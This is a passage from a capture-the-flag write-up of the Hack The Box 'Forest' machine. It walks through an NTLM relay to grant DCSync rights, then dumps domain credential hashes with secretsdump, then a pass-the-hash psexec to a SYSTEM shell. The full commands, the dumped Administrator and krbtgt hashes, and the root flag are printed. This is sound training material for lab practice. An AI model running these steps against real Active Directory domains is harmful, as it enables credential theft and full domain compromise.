When you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!

root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.I open a browser for localhost and provide the sedje credentials.

[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And ntlmrelayx.py already tells me what to do, sedje now has proper permissions to continue secretsdump.py.

root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---

Use secretsdump.py to get all the hashes in the domain

root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc

Author: Puckiestyle

Protected: HTB-POSTMAN-NL

This content is password protected. To view it please enter your password below:

Posted on